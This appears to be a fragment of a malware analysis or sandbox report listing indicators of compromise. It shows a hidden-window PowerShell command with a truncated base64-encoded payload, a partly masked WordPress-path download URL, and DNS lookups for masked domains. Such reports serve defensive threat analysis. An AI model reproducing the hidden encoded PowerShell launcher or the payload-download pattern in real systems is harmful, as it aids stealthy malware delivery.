Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABBAHYAcwBrAHIAdQByAGwAdQBxAD0AJwBJAGYAbQB5AGkAawBlAHMAJwA7ACQAWgBiAHEAagBzAHIAaABiAGUAbQBmACAAPQAgACcAMwA5ACcAOwAkAFIAbgB1AG4AcgBoAG4AcwBkAG4AcAA9ACcASABwAG0...
- http://www.ty###teq.com/wp-content/w87q6/
- DNS ASK al#####s-airport.com
- DNS ASK te####eworld.shop
- DNS ASK el####mberto.com
- DNS ASK pr####nequill.com
- DNS ASK ty###teq.com